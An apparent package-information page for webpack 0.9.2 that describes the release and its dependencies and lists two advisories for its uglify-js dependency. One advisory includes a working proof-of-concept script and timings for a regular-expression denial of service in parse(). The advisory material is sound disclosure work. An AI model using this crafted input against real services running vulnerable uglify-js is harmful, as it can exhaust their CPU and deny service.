Webpack version 0.9.2 represents a minor update to the 0.9.1 release, offering refinements and potential bug fixes within the popular module bundler. Both versions cater to developers seeking to streamline web application development by packaging CommonJs, AMD, and labeled modules for browser deployment. The core functionality remains consistent, enabling code splitting into bundles for on-demand loading, enhancing performance and optimizing initial load times. A rich ecosystem of loaders is supported, allowing pre-processing of diverse file types like JSON, Jade, CoffeeScript, CSS, and LESS, alongside custom loaders for specialized needs.
The dependency structure is identical, leveraging utilities like async, clone, mkdirp, esprima, tapable, optimist, uglify-js, webpack-core, enhanced-resolve, and node-libs-browser. Similarly, the devDependencies for testing and development, including mocha, should, express, and various loaders such as css-loader, file-loader, and coffee-loader are consistent between the releases.
The key difference lies in the release date, with version 0.9.2 published on March 14, 2013, a day after version 0.9.1. This suggests 0.9.2 incorporates immediate fixes or minor improvements identified shortly after the initial 0.9.1 release. Developers should use the newest version for greatest stability.
For those already using 0.9.1, migrating to 0.9.2 should be seamless. New adopters benefit from a potentially more polished initial experience. Both versions provide a solid foundation for managing complex project dependencies and optimizing web application delivery, especially when combined with the flexibility offered by its loader architecture.
All vulnerabilities related to version 0.9.2 of the package
Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js
Versions of uglify-js prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification.
Upgrade UglifyJS to version >= 2.4.24.
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method.
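// test.js: parse a numeric literal whose run of digits has the length given as argv[2]
var u = require('uglify-js');
var genstr = function (len, chr) {
    var result = "";
    for (var i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};
// Parse time grows sharply with the length of the digit run (see the timings below)
u.parse("var a = " + genstr(process.argv[2], "1") + ".1ee7;");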
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.